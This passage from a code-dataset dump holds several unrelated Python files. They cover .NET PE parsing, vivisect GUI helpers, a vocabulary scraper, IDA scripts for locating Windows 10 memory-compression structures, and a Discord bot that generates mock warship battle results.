hex(self.nDNetDirectoryOffset))
self.DNetDirectory = DNetDirectory()
self.DNetDirectory.vsParse(pedata, offset=self.nDNetDirectoryOffset)
self.logger.debug(
".NET directory info: cb: 0x%s, rva: 0x%s",
hex(self.DNetDirectory.cb), hex(self.DNetDirectory.nMetaDataRVA))
self.nDNetMetaDataHeaderOffset = self.FileOffsetFromRVA(
self.DNetDirectory.nMetaDataRVA)
self.DNetMetaDataHeader = DNetMetaDataHeader()
self.DNetMetaDataHeader.vsParse(
pedata, offset=self.nDNetMetaDataHeaderOffset)
self.logger.debug(
".NET metadata signature: 0x%s, version: %s",
self.DNetMetaDataHeader.Signature,
self.DNetMetaDataHeader.sVersion)
self.nStreamsOffset = self.nDNetMetaDataHeaderOffset + len(self.DNetMetaDataHeader)
self.StreamMain = None
nStreamInfoOffset = self.nStreamsOffset
for i in range(self.DNetMetaDataHeader.nNumberOfSteams):
dnsi = DNetStreamInfo()
dnsi.vsParse(pedata, nStreamInfoOffset)
self.logger.debug(
".NET stream: %s, offset: %s, size: %s",
dnsi.sName, hex(dnsi.nOffset), hex(dnsi.nSize))
if self.StreamMain is None:
self.StreamMain = dnsi
nStreamInfoOffset += len(dnsi)
nTargetStreamOffset = nStreamInfoOffset
thdr = DNetTablesHeader()
thdr.vsParse(pedata, nTargetStreamOffset)
self.logger.debug(
".NET main stream header: %s at %s",
hex(thdr.nMaskValid), hex(nTargetStreamOffset))
nStartOfNumberOfRows = nTargetStreamOffset + len(thdr)
rc = self._LoadTablesInfo(
pedata, nStartOfNumberOfRows, thdr.nMaskValid)
return rc
def Close(self):
'''
Close the PE file handle to free up the file for edit/delete
'''
self.pe.close()
def GetSectionByRVA(self, rva):
'''
Given an RVA, find the section that such RVA belongs to
@return section on success, None if not found.
'''
for section in self.pe.sections:
sstart = section.VirtualAddress
send = sstart + section.Misc_VirtualSize
if sstart <= rva and rva <= send:
return section
return None
def GetSectionOffsetFromRVA(self, rva):
section = self.GetSectionByRVA(rva)
if section is None:
return None
return rva - section.VirtualAddress
def FileOffsetFromRVA(self, rva):
section = self.GetSectionByRVA(rva)
if section is None:
return None
offset = self.GetSectionOffsetFromRVA(rva)
return section.PointerToRawData + offset
def MIDToToken(self, nMid):
return MIDToToken(nMid)
def TokenToMID(self, nToken):
return TokenToMID(nToken)
def ReadDWORD(self, offset):
_s = [chr(_) for _ in self.ReadBytes(offset, 4)]
return struct.unpack("<I", ''.join(_s))[0]
def ReadBytes(self, offset, size):
if offset < 0 or offset + size > self.filesize:
return None
_bytez = self.filedata[offset:offset + size]
return _bytez
def SetByte(self, offset, bytez):
if offset < 0 or offset + len(bytez) > self.filedata:
return False
for i in range(len(bytez)):
self.filedata[offset + i] = bytez[i]
return True
# -------------------------------------------------------------------------
def _GetDNetEntry(self):
for _de in self.pe.OPTIONAL_HEADER.DATA_DIRECTORY:
if _de.name == 'IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR':
de = _de
break
return de
def _LoadTablesInfo(self, data, nStartOfNumberOfRows, nMask):
'''
Load .NET tables content. This function does minimum amount of work,
only to get to the MethodDef table and parse out the methods info.
'''
nNumberOfRows = 0
self.Tables = list()
# First, check all known TokenType against the valid mask from
# .NET metadata header to determine how many tables are available
for i in range(len(DNT_Types)):
nTokenType = DNT_Types[i]
nMaskNumber = GetMaskNumberByBits(nTokenType)
bExist = (nMaskNumber & nMask) != 0
if bExist:
tbl = {
'nTokenType': nTokenType,
'name': DNT_Names.get(nTokenType)
}
self.Tables.append(tbl)
# Read the number of rows for each table. The number of entries is
# determine by the ValidMask field of the .NET metadata header
for i in range(len(self.Tables)):
v = self.Tables[i]
o = nStartOfNumberOfRows + i * DWORD_SIZE
nRows = self.ReadDWORD(o)
self.Tables[i].update({
'nRows': nRows, 'nIndex': i
})
nStartOfTablesData = nStartOfNumberOfRows + DWORD_SIZE * (len(self.Tables))
self.logger.debug("Start of tables data: %s", hex(nStartOfTablesData))
nCurrentOffset = 0
# For each table, parse the table content, but only to advance the file
# offset. The only table we really care about is the MethodDef table
for i in range(len(self.Tables)):
tbl = self.Tables[i]
rows = list()
self.logger.debug(
"Table %s strats at %s",
tbl.get('name'), hex(nStartOfTablesData + nCurrentOffset))
for j in range(1, tbl.get('nRows') + 1):
# NOTE: Row index starts at 1
nTokenType = tbl.get('nTokenType')
if nTokenType == DNT_Module:
ctor = DNetTableRow_Module
elif nTokenType == DNT_TypeRef:
ctor = DNetTableRow_TypeRef
elif nTokenType == DNT_TypeDef:
ctor = DNetTableRow_TypeDef
elif nTokenType == DNT_Field:
ctor = DNetTableRow_Field
elif nTokenType == DNT_MethodDef:
ctor = DNetTableRow_MethodDef
else:
# ignore the other tables after MethodDef
continue
row = ctor()
row.vsParse(data, nStartOfTablesData + nCurrentOffset)
if nTokenType == DNT_MethodDef:
# Save the token and the MID for convenience
row.nToken = MIDToToken(j)
row.nMID = j
self.logger.debug("Adding a %s row", tbl.get('name'))
nCurrentOffset += len(row)
rows.append(row)
tbl.update({'rows': rows})
# The Tables variable goes out of scope here. So, we are saving
# the methods for use later.
for i in range(len(self.Tables)):
if self.Tables[i].get('nTokenType') == DNT_MethodDef:
self.Methods = self.Tables[i].get('rows')
return True
return False
``` |
{
"source": "4k4xs4pH1r3/M4nifest0_IG_ReportV4",
"score": 2
} |
#### File: 4k4xs4pH1r3/M4nifest0_IG_ReportV4/get_platform_name.py
```python
import platform
import struct
import sys
from ctypes import cdll, c_char_p, CFUNCTYPE
from fnmatch import fnmatch
plat_table = (
('windows', ('windows', 'cygwin-*')),
('darwin', ('darwin',)),
('ios', ('ios',)),
('linux', ('linux*',)),
('freebsd', ('freebsd*', 'openbsd*', 'isilon onefs')),
('poky', ('poky',)),
)
arch_table = (
('x86', ('i?86', )),
('x86_64', ('x64', 'x86_64', 'amd64', 'intel')),
('arm', ('armv5',)),
('armv6', ('armv6l',)),
('armv7', ('armv7l',)),
('ppc64', ('ppc64le',)),
('mips32', ('mips',)),
('aarch32', ('aarch32',)),
('aarch64', ('aarch64', 'arm64'))
)
def _match_features(patterns, s):
for pat in patterns:
if fnmatch(s, pat):
return True
def _gnu_get_libc_version():
try:
prototype = CFUNCTYPE(c_char_p)
ver = prototype(('gnu_get_libc_version', cdll.LoadLibrary('')))()
return ver.decode().split('.')
except Exception:
pass
def format_platform():
plat = platform.system().lower()
mach = platform.machine().lower()
for alias, platlist in plat_table:
if _match_features(platlist, plat):
plat = alias
break
if plat == 'linux':
cname, cver = platform.libc_ver()
if cname == 'musl':
plat = 'musl'
elif cname == 'libc':
plat = 'android'
elif cname == 'glibc':
v = _gnu_get_libc_version()
if v and len(v) >= 2 and (int(v[0]) * 100 + int(v[1])) < 214:
plat = 'centos6'
for alias, archlist in arch_table:
if _match_features(archlist, mach):
mach = alias
break
if plat == 'windows' and mach == 'x86_64':
bitness = struct.calcsize('P'.encode()) * 8
if bitness == 32:
mach = 'x86'
return '.'.join([plat, mach])
if __name__ == '__main__':
print('platform.system is "%s"' % platform.system())
print('platform.machine is "%s"' % platform.machine())
print('sys.byteorder is "%s"' % sys.byteorder)
print('The standard platform name is "%s"' % format_platform())
``` |
{
"source": "4k4xs4pH1r3/vivisect",
"score": 2
} |
#### File: vivisect/qt/funcviews.py
```python
from PyQt4 import QtCore,QtGui
import envi.qt.memcanvas as e_q_memcanvas
import vivisect.qt.ctxmenu as viv_q_ctxmenu
import visgraph.renderers.qgraphtree as vg_qgraphtree
from vqt.basics import *
class FuncBlockModel(BasicModel):
columns = ( 'Base Address', 'Size' )
class FunctionBlocksView(BasicTreeView):
_sig_BlockSelected = QtCore.pyqtSignal( object )
def __init__(self, vw, parent=None):
self.vw = vw
BasicTreeView.__init__(self, parent=parent)
self.setModel( FuncBlockModel() )
self.setWindowTitle('Code Blocks: ')
def selectionChanged(self, selected, unselected):
indexes = selected.indexes()
if indexes:
index = indexes[0]
row = self.model().rows[ index.row() ]
block = row[-1]
self._sig_BlockSelected.emit( block )
cmap = {}
bva, bsize, fva = block
for i in xrange(bsize):
cmap[ bva + i ] = 'yellow'
# Since we have a reference to the GUI, lets also
# send a coloration signal.
vwgui = self.vw.getVivGui()
vwgui.vivMemColorSignal.emit( cmap )
return BasicTreeView.selectionChanged( self, selected, unselected )
def closeEvent(self, event):
# On close, remove any color mappings...
vwgui = self.vw.getVivGui()
vwgui.vivMemColorSignal.emit( {} )
return BasicTreeView.closeEvent( self, event )
def functionSelected(self, fva):
self.setWindowTitle( 'Code Blocks: %s' % self.vw.getName( fva ) )
blocks = self.vw.getFunctionBlocks( fva )
rows = [ ('0x%.8x' % block[0], block[1], block) for block in blocks ]
model = FuncBlockModel( rows=rows )
self.setModel( model )
self.sortByColumn( 0, QtCore.Qt.AscendingOrder )
class FuncCallsView(QtGui.QWidget):
def __init__(self, vw, parent=None):
self.vw = vw
QtGui.QWidget.__init__(self, parent=parent)
self.graphview = vg_qgraphtree.QGraphTreeView( None, (), parent=self)
self.graphview._sig_NodeContextMenu.connect( self.nodeContextMenu )
self.setLayout( VBox( self.graphview ) )
def functionSelected(self, fva):
self.setWindowTitle('Call Graph: %s' % self.vw.getName( fva ))
nprops = self.vw._call_graph.getNodeProps( fva )
self.graphview.loadNewGraph( self.vw._call_graph, ( (fva,nprops), ) )
def nodeContextMenu(self, pos, nid, nprops):
menu = QtGui.QMenu(parent=self)
viv_q_ctxmenu.buildContextMenu(self.vw, va=nid, menu=menu)
menu.exec_(pos)
```
#### File: vivisect/vqt/main.py
```python
import sys
import functools
import traceback
from Queue import Queue
from threading import currentThread
from PyQt4 import QtCore, QtGui
import envi.threads as e_threads
def idlethread(func):
'''
A decorator which causes the function to be called by the qt
main thread rather than synchronously...
NOTE: This makes the call async handled by the qt main
loop code. you can NOT return anything.
'''
def idleadd(*args, **kwargs):
if iAmQtSafeThread():
return func(*args, **kwargs)
guiq.append( (func, args, kwargs) )
functools.update_wrapper(idleadd,func)
return idleadd
def workthread(func):
'''
Proxy a call through the single vqt.main worker thread
(who exists to keep the GUI from blocking on stuff... )
'''
# If we're already the work thread, just do it.
def workadd(*args, **kwargs):
if getattr(currentThread(),'VQtWorkerThread',False):
return func(*args, **kwargs)
workerq.append( (func,args,kwargs) )
functools.update_wrapper(workadd,func)
return workadd
def boredthread(func):
'''
The same as "workthread" above, but drop the request on the
floor if the worker thread already has better things to do...
'''
# If we're already the work thread, just do it.
def workadd(*args, **kwargs):
if getattr(currentThread(),'VQtWorkerThread',False):
return func(*args, **kwargs)
if not len(workerq):
workerq.append( (func,args,kwargs) )
functools.update_wrapper(workadd,func)
return workadd
def idlethreadsync(func):
'''
Similar to idlethread except that it is synchronous and able
to return values.
'''
q = Queue()
def dowork(*args, **kwargs):
try:
q.put(func(*args, **kwargs))
except Exception, e:
q.put(e)
def idleadd(*args, **kwargs):
if iAmQtSafeThread():
return func(*args, **kwargs)
guiq.append( (dowork, args, kwargs) )
return q.get()
functools.update_wrapper(idleadd,func)
return idleadd
class QFireThread(QtCore.QThread):
def __init__(self, callable, args, kwargs):
QtCore.QThread.__init__(self)
self.args = args
self.kwargs = kwargs
self.callable = callable
def run(self):
self.callable(*self.args, **self.kwargs)
def fireqtthread(func):
def doqtthread(*args, **kwargs):
func._qt_thread = QFireThread(func, args, kwargs)
func._qt_thread.start()
return func._qt_thread
functools.update_wrapper(doqtthread,func)
return doqtthread
def iAmQtSafeThread():
return getattr(currentThread(),'QtSafeThread',False)
class QEventThread(QtCore.QThread):
'''
A thread who exists to consume callback requests from the
given workq and fire them into Qt *safely*.
'''
idleadd = QtCore.pyqtSignal(object,object,object)
def __init__(self, workq):
QtCore.QThread.__init__(self)
self.workq = workq
def run(self):
while True:
try:
todo = self.workq.get()
if todo == None:
continue
func,args,kwargs = todo
if func == None:
return
self.idleadd.emit(func,args,kwargs)
except Exception, e:
print('vqt event thread: %s' % e)
class VQApplication(QtGui.QApplication):
guievents = QtCore.pyqtSignal(str,object)
def __init__(self, *args, **kwargs):
QtGui.QApplication.__init__(self, *args, **kwargs)
self.vqtchans = {}
def callFromQtLoop(self, callback, args, kwargs):
callback(*args,**kwargs)
class QEventChannel(QtCore.QObject):
guievents = QtCore.pyqtSignal(str,object)
@e_threads.firethread
def workerThread():
# We are *not* allowed to make Qt API calls
currentThread().VQtWorkerThread = True
while True:
try:
todo = workerq.get()
if todo != None:
func,args,kwargs = todo
if func == None:
return
func(*args,**kwargs)
except Exception, e:
print('vqt worker warning: %s' % e)
def startup(css=None):
# yea yea.... globals suck...
global qapp # the main QApplication
global guiq # queue of GUI calls to proxy
global ethread # QtThread that consumes guiq
global workerq # queue of "worker" calls to proxy
guiq = e_threads.EnviQueue()
workerq = e_threads.EnviQueue()
currentThread().QtSafeThread = True
qapp = VQApplication(sys.argv)
if css:
qapp.setStyleSheet( css )
ethread = QEventThread(guiq)
ethread.idleadd.connect( qapp.callFromQtLoop )
ethread.start()
workerThread()
def main():
global qapp
if not iAmQtSafeThread():
raise Exception('main() must be called by same thread as startup()!')
qapp.exec_()
def eatevents():
global qapp
qapp.processEvents()
def vqtevent(event,einfo):
'''
Fire an event into the application wide GUI events subsystem.
Each event should be an event name ( str ) and arbitrary event
info context.
'''
global qapp
qapp.guievents.emit(event,einfo)
chan = qapp.vqtchans.get(event)
if chan != None:
chan.guievents.emit(event,einfo)
def vqtconnect(callback, event=None):
'''
Connect to the application wide "gui events" which has
a callback syntax:
callback(event,einfo)
Optionally specify an event name to only recieve events
of the specified type.
'''
global qapp
if event == None:
qapp.guievents.connect( callback )
return
chan = qapp.vqtchans.get(event)
if chan == None:
chan = QEventChannel()
qapp.vqtchans[event] = chan
chan.guievents.connect(callback)
def vqtdisconnect(callback, event=None):
'''
Connect to the application wide "gui events" which has
a callback syntax:
callback(event,einfo)
Optionally specify an event name to only recieve events
of the specified type.
'''
global qapp
if event == None:
qapp.guievents.disconnect( callback )
return
chan = qapp.vqtchans.get(event)
if chan != None:
chan.guievents.disconnect(callback)
```
#### File: vivisect/vqt/qpython.py
```python
import types
import traceback
from threading import Thread
from PyQt4 import QtCore, QtGui
from vqt.main import idlethread
from vqt.basics import *
@idlethread
def scripterr(msg, info):
msgbox = QtGui.QMessageBox()
msgbox.setText('Script Error: %s' % msg)
msgbox.setInformativeText(info)
msgbox.exec_()
class ScriptThread(Thread):
def __init__(self, cobj, locals):
Thread.__init__(self)
self.setDaemon(True)
self.cobj = cobj
self.locals = locals
def run(self):
try:
exec(self.cobj, self.locals)
except Exception, e:
scripterr(str(e), traceback.format_exc())
class VQPythonView(QtGui.QWidget):
def __init__(self, locals=None, parent=None):
if locals == None:
locals = {}
self._locals = locals
QtGui.QWidget.__init__(self, parent=parent)
self._textWidget = QtGui.QTextEdit(parent=self)
self._botWidget = QtGui.QWidget(parent=self)
self._help_button = QtGui.QPushButton('?', parent=self._botWidget)
self._run_button = QtGui.QPushButton('Run', parent=self._botWidget)
self._run_button.clicked.connect(self._okClicked)
self._help_button.clicked.connect( self._helpClicked )
self._help_text = None
hbox = HBox( None, self._help_button, self._run_button )
self._botWidget.setLayout( hbox )
vbox = VBox( self._textWidget, self._botWidget )
self.setLayout( vbox )
self.setWindowTitle('Python Interactive')
def _okClicked(self):
pycode = str(self._textWidget.document().toPlainText())
cobj = compile(pycode, "vqpython_exec.py", "exec")
sthr = ScriptThread(cobj, self._locals)
sthr.start()
def _helpClicked(self):
withhelp = []
for lname,lval in self._locals.items():
if type(lval) in (types.ModuleType, ):
continue
doc = getattr(lval, '__doc__', '\nNo Documentation\n')
if doc == None:
doc = '\nNo Documentation\n'
withhelp.append( (lname, doc) )
withhelp.sort()
txt = 'Objects/Functions in the namespace:\n'
for name,doc in withhelp:
txt += ( '====== %s\n' % name )
txt += ( '%s\n' % doc )
self._help_text = QtGui.QTextEdit()
self._help_text.setReadOnly( True )
self._help_text.setWindowTitle('Python Interactive Help')
self._help_text.setText( txt )
self._help_text.show()
``` |
{
"source": "4k4xs4pH1r3/vocab_scraper",
"score": 3
} |
#### File: 4k4xs4pH1r3/vocab_scraper/vocab.py
```python
import os
import re
import codecs
import string
import fnmatch
import argparse
import operator
from collections import defaultdict
def parse(f, word_frequencies, encoding='cp1251'):
with codecs.open(f, 'r', encoding) as infile:
for line in infile.readlines():
# Omit ASCII characters (between space (0x20) and tilde (0x7e))
words = re.split('[ -~]+', line)
for word in words:
word = word.strip(' \t\r\n\0')
if len(word):
word_frequencies[word] += 1
def parse_args():
desc = 'Vocabulary scraper'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('outfile', help='Output file')
parser.add_argument('--startdir', default='.', help='Directory to recurse')
parser.add_argument('--ienc', default='cp1251', help='Input encoding')
parser.add_argument('--oenc', default='utf-8', help='Output encoding')
return parser.parse_args()
def main():
args = parse_args()
word_frequencies = defaultdict(int)
files = []
masks = ['*.c', '*.h', '*.cpp', '*.hpp', '*.txt', '*.cs']
for root, dirnames, filenames in os.walk(args.startdir):
for mask in masks:
for filename in fnmatch.filter(filenames, mask):
files.append(os.path.join(root, filename))
for file in files:
try:
parse(file, word_frequencies, args.ienc)
except UnicodeDecodeError:
pass
sorted_words = sorted(word_frequencies.items(), key=operator.itemgetter(1))
sorted_words.reverse()
with codecs.open(args.outfile, 'w', args.oenc) as outfile:
for s, n in sorted_words:
outfile.write(str(n) + ': ' + s + '\r\n')
if __name__ == '__main__':
main()
``` |
{
"source": "4k4xs4pH1r3/win10_auto",
"score": 2
} |
#### File: 4k4xs4pH1r3/win10_auto/Smkm.py
```python
import logging
import struct
from Tools import Tools
class Smkm(Tools):
"""
The Smkm class corresponds to the Windows 10 SMKM structure.The SMKM
structure is the last global structure used before relying on store-specific
structures to locate the compressed page.
"""
def __init__(self, loglevel=logging.INFO):
self.tools = super(Smkm, self).__init__()
self.logger = logging.getLogger("SMKM")
self.logger.setLevel(loglevel)
self.fe = self.get_flare_emu()
return
def _dump(self):
"""
Architecture agnostic function used to dump all located fields.
"""
arch = 'x64' if self.Info.is_64bit() else 'x86'
self.logger.info("SmkmStoreMetadataArray: {0:#x}".format(self.Info.arch_fns[arch]['sk_storemetadataarray'](self)))
return
@Tools.Info.arch32
@Tools.Info.arch64
def sk_storemetadataarray(self):
"""
This is an array of 32 pointers, each of which points to an array of 32 SMKM_STORE_METADATA
structures. The SmKmStoreRefFromStoreIndex function traverses the pointer array. This
signature asks the function to locate Store 0. The value stored in *CX at the end of
function emulation corresponds to the offset of the StoreMetadataArray. Disassembly snippet
from Windows 10 1809 x64 shown below.
SmKmStoreRefFromStoreIndex SmKmStoreRefFromStoreIndex proc near
SmKmStoreRefFromStoreIndex
SmKmStoreRefFromStoreIndex mov eax, edx
SmKmStoreRefFromStoreIndex+2 shr rax, 5
SmKmStoreRefFromStoreIndex+6 mov r8d, edx
SmKmStoreRefFromStoreIndex+9 mov rdx, [rcx+rax*8]
SmKmStoreRefFromStoreIndex+D test rdx, rdx
SmKmStoreRefFromStoreIndex+10 jnz short loc_140018069
SmKmStoreRefFromStoreIndex+12 xor eax, eax
SmKmStoreRefFromStoreIndex+14 retn
SmKmStoreRefFromStoreIndex+15 loc_140018069:
SmKmStoreRefFromStoreIndex+15 and r8d, 1Fh
SmKmStoreRefFromStoreIndex+19 lea rax, [r8+r8*4]
SmKmStoreRefFromStoreIndex+1D lea rax, [rdx+rax*8]
SmKmStoreRefFromStoreIndex+21 retn
SmKmStoreRefFromStoreIndex+21 SmKmStoreRefFromStoreIndex endp
"""
(fn_addr, fn_name) = self.find_ida_name("SmKmStoreRefFromStoreIndex")
lp_addr_smkmstoremgr = self.fe.loadBytes(struct.pack("<I", 0x1000))
num_store = 0x0
reg_cx = 'rcx' if self.Info.is_64bit() else 'ecx'
reg_dx = 'rdx' if self.Info.is_64bit() else 'edx'
regState = {reg_cx:lp_addr_smkmstoremgr, reg_dx:num_store}
self.fe.emulateRange(fn_addr, registers=regState)
return self.fe.getRegVal(reg_cx) - lp_addr_smkmstoremgr
```
#### File: 4k4xs4pH1r3/win10_auto/StStore.py
```python
import logging
from Tools import Tools
class StStore(Tools):
"""
The StStore class corresponds to the Windows 10 ST_STORE structure. The
ST_STORE structure is nested within SMKM_STORE and represents a single store.
The nested structure ST_DATA_MGR is the only field of interest in page retrieval.
"""
def __init__(self, loglevel=logging.INFO):
self.tools = super(StStore, self).__init__()
self.logger = logging.getLogger("ST_STORE")
self.logger.setLevel(loglevel)
self.fe = self.get_flare_emu()
return
def _dump(self):
"""
Architecture agnostic function used to dump all located fields.
"""
arch = 'x64' if self.Info.is_64bit() else 'x86'
self.logger.info("StDataMgr: {0:#x}".format(self.Info.arch_fns[arch]['ss_stdatamgr'](self)))
return
@Tools.Info.arch32
@Tools.Info.arch64
def ss_stdatamgr(self):
"""
This nested structure contains information used to correlate an SM_PAGE_KEY with a chunk key,
from which a compressed page's location can be derived from within a region of
MemCompression.exe. See ST_DATA_MGR for additional information. This function relies on the
second argument for StDmStart remaining constant. Disassembly snippet from Windows 10 1809 x86
shown below.
StStart+27A lea edx, [esi+38h]
StStart+27D mov ecx, esi
StStart+27F call ?StDmStart@?$ST_STORE@USM_TRAITS@@@@SGJPAU1@PAU_ST_DATA_MGR@1@...
"""
(startAddr, endAddr) = self.locate_call_in_fn("?StStart", "StDmStart")
self.fe.iterate([endAddr], self.tHook)
reg_dx = 'rdx' if self.Info.is_64bit() else 'edx'
return self.fe.getRegVal(reg_dx)
```
#### File: 4k4xs4pH1r3/win10_auto/w10deflate_auto.py
```python
import logging
from Magic import Magic
from SmkmStoreMgr import SmkmStoreMgr
from Smkm import Smkm
from SmkmStoreMetadata import SmkmStoreMetadata
from SmkmStore import SmkmStore
from StStore import StStore
from StDataMgr import StDataMgr
import idc
def main(loglevel=logging.INFO):
Magic(loglevel=loglevel)._dump()
SmkmStoreMgr(loglevel=loglevel)._dump()
Smkm(loglevel=loglevel)._dump()
SmkmStoreMetadata(loglevel=loglevel)._dump()
SmkmStore(loglevel=loglevel)._dump()
StStore(loglevel=loglevel)._dump()
StDataMgr(loglevel=loglevel)._dump()
return
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
if idc.get_name_ea_simple("_KiSystemStartup@4") == -1:
logging.warning("Launch script from within an ntoskrnl IDB with PDB symbols loaded")
else:
main(loglevel=logging.INFO)
``` |
{
"source": "4ka0/QA-checker",
"score": 3
} |
#### File: 4ka0/QA-checker/output.py
```python
from colorama import Fore
def output_results(segments):
'''
Function for outputting QA check results.
'''
print(Fore.CYAN + '\nRESULTS:\n')
errors_found_overall = False
for segment in segments:
if segment.error_found:
# Results for untranslated segments
if segment.untranslated_seg:
print(Fore.RED + 'Untranslated segment found.')
errors_found_overall = True
# Results for consecutive spaces
if segment.consecutive_space_found:
print(Fore.RED + 'Consecutive spaces found.')
errors_found_overall = True
# Results for leading spaces
if segment.leading_space_found:
print(Fore.RED + 'Leading space found.')
errors_found_overall = True
# Results for trailing spaces
if segment.trailing_space_found:
print(Fore.RED + 'Trailing space found.')
errors_found_overall = True
# Results for leading capitalization
if segment.capitalization_error_found:
print(Fore.RED + 'Leading word not capitalized.')
errors_found_overall = True
# Results for repeated words
if segment.repeated_word_found:
repeated_word_string = list_string(segment.repeated_words)
print(Fore.RED + 'Repeated words found: ' +
repeated_word_string)
errors_found_overall = True
# Results for trailing punctuation
if segment.trailing_punctuation_error:
print(Fore.RED + 'Trailing punctuation does not match.')
errors_found_overall = True
# Results for unpaired symbols
if segment.unpaired_symbol_found:
unpaired_symbol_string = list_string(segment.unpaired_symbols)
if len(segment.unpaired_symbols) > 1:
print(Fore.RED + 'Unpaired symbols found: ' +
unpaired_symbol_string)
else:
print(Fore.RED + 'Unpaired symbol found: ' +
unpaired_symbol_string)
errors_found_overall = True
# Results for missing numbers
if len(segment.missing_nums) > 0:
num_string = dict_string(segment.missing_nums)
if ',' in num_string:
print(Fore.RED + 'Missing numbers found: ' + num_string)
else:
print(Fore.RED + 'Missing number found: ' + num_string)
errors_found_overall = True
# Results for extra numbers
if len(segment.extra_nums) > 0:
num_string = dict_string(segment.extra_nums)
if ',' in num_string:
print(Fore.RED + 'Extra numbers found: ' + num_string)
else:
print(Fore.RED + 'Extra number found: ' + num_string)
errors_found_overall = True
# Results for Asian characters and symbols
if segment.asian_char_found:
asian_char_string = list_string(segment.asian_chars)
if len(segment.asian_chars) > 1:
print(Fore.RED + 'Asian characters found: ' +
asian_char_string)
else:
print(Fore.RED + 'Asian character found: ' +
asian_char_string)
errors_found_overall = True
print(Fore.CYAN + 'Source text:')
print(Fore.RESET + segment.source_text)
print(Fore.CYAN + 'Target text:')
print(Fore.RESET + segment.target_text)
print('\n')
if not errors_found_overall:
print(Fore.GREEN + '\nNo errors found.\n')
def list_string(error_list):
'''
Function for building a single string from a list.
E.g. builds a single string from all ints in the
missing_nums list of a given segment.
'''
error_string = ''
for item in error_list:
error_string = error_string + str(item) + ', '
error_string = error_string.strip(', ')
return error_string
def dict_string(error_list):
'''
Function for building a single string from a dict.
E.g. builds a single string from all keys and values in the
missing_aplhanums Counter object of a given segment.
'''
error_string = ''
for item in error_list:
item_count = error_list[item]
for x in range(item_count):
error_string = error_string + str(item) + ', '
error_string = error_string.strip(', ')
return error_string
``` |
{
"source": "4Kamei/verilog_sources",
"score": 2
} |
#### File: src_test/ethernet_rx/ethernet_rx.py
```python
import cocotb
import logging
from scapy.all import Ether, ARP
from cocotb.clock import Clock
from cocotb.triggers import Event, ClockCycles
from cocotbext.eth import MiiSource, GmiiFrame, MiiPhy
IP_ADDR = "192.168.100.0"
@cocotb.test()
async def test_ethernet_rx(dut):
cocotb.fork(Clock(dut.rx_clk, 2, units="ns").start())
l = logging.getLogger("cocotb")
l.setLevel(logging.DEBUG)
dut.reset <= 1;
await ClockCycles(dut.rx_clk, 10)
dut.reset <= 0;
packet = Ether(dst="01:23:45:67:89:ab")/ARP(pdst=IP_ADDR)
bts = bytearray(packet.build())
mii_src = MiiSource(dut.rxd, None, dut.rx_dv, dut.rx_clk)
frame = GmiiFrame.from_payload(bts)
await mii_src.send(frame)
packet = Ether(dst="ff:ff:ff:ff:ff:00")/ARP(pdst=IP_ADDR)
frame2 = GmiiFrame.from_payload(bytearray(packet.build()), tx_complete=Event())
await mii_src.send(frame2)
await mii_src.wait()
await frame2.tx_complete.wait()
assert True
``` |
{
"source": "4KaNE/Discord-Lottery-Bot",
"score": 3
} |
#### File: 4KaNE/Discord-Lottery-Bot/output_battle_results.py
```python
import json
import random
# loading table
table_data = {}
try:
with open('./output_battle_table.json', 'r', encoding="utf-8_sig") as fc:
table_data = json.load(fc)
except json.JSONDecodeError as e:
print('JSONDecodeError: ', e)
exit(e)
except FileNotFoundError as e:
print('FileNotFoundError: ', e)
exit(e)
# get my tier
def get_tier(damage):
# 対象Tierの抽出
target_table_data = [x for x in table_data['tiers'] if int(x['min']) <= damage <= int(x['max'])]
x = random.choice(target_table_data)
my_tier = int(x['tier'])
n = random.choice([1, 2, 3])
if n == 1:
enemy_min_tier = int(x['1_min'])
enemy_max_tier = int(x['1_max'])
elif n == 2:
enemy_min_tier = int(x['2_min'])
enemy_max_tier = int(x['2_max'])
else:
enemy_min_tier = int(x['3_min'])
enemy_max_tier = int(x['3_max'])
return my_tier, enemy_min_tier, enemy_max_tier
# get my ship
def get_my_ship(tier):
ships = []
for x in table_data['ships']:
if tier == int(x['tier']):
ships.append(x['name'])
return random.choice(ships)
# get enemy ships
def get_enemy_ships(my_tier, min_tier, max_tier):
# 対象Tierの抽出
target_table_data = [x for x in table_data['ships'] if min_tier <= int(x['tier']) <= max_tier]
enemy_cv_ships_counter = 0
enemy_ships = []
loop_counter = 0
while len(enemy_ships) < 12 and loop_counter < 1000:
loop_counter += 1 # 無限ループ防止用
x = random.choice(target_table_data)
kind = x['kind']
tier = int(x['tier'])
if kind == '空母':
if enemy_cv_ships_counter > 0 or tier != my_tier:
# 当面空母は自分と同Tierの1隻限定
continue
else:
enemy_cv_ships_counter += 1
enemy_ships.append(x)
return enemy_ships
class ShipDamageClass:
def __init__(self):
self.name = ''
self.hp_total = 0
self.hp_remains = 0
self.damage = 0
self.sink = ''
# get damage results
def get_damage_results(damage, enemy_ships):
remains = int(damage)
pers = list(range(1, 100))
target_ships = []
target_ships_hp_total = 0
for ship in enemy_ships:
x = ShipDamageClass()
x.name = ship['name']
x.hp_total = round(int(ship['hp']) + int(ship['hp_add']))
x.hp_remains = x.hp_total
x.damage = 0
target_ships.append(x)
target_ships_hp_total += x.hp_total
if target_ships_hp_total < remains:
return ' 敵艦全滅(' + str(target_ships_hp_total) + ')以上のダメージを叩き出しました。神かよ'
loop_counter = 0
while remains > 0 and loop_counter < 100:
loop_counter += 1 # 無限ループ防止用
x = random.choice(target_ships)
if x.hp_remains < 0:
continue
per_hp = random.choice(pers)
ship_damage = round(x.hp_total * per_hp / 100)
if x.hp_remains < ship_damage:
ship_damage = x.hp_remains
if remains < ship_damage:
ship_damage = remains
x.damage += ship_damage
x.hp_remains -= ship_damage
remains -= ship_damage
n = random.choice(pers)
if n <= 10:
# 攻撃1回につき10%の確率で撃沈
x.sink = '撃沈'
damage_ships = []
for x in target_ships:
if x.damage > 0:
s = x.name + x.sink + '(' + "{:,}".format(x.damage) + ')'
damage_ships.append(s)
return '、'.join(damage_ships)
# output_battle_results
def output_battle_results(damage):
tiers = get_tier(damage)
my_tier = tiers[0]
enemy_min_tier = tiers[1]
enemy_max_tier = tiers[2]
my_ship = get_my_ship(my_tier)
enemy_ships = get_enemy_ships(my_tier, enemy_min_tier, enemy_max_tier)
damage_result = get_damage_results(damage, enemy_ships)
result = 'あなたの使用艦艇は' + my_ship + 'で、戦果は' + damage_result + 'でした。'
return result
``` |
{
"source": "4KaNE/utils",
"score": 3
} |
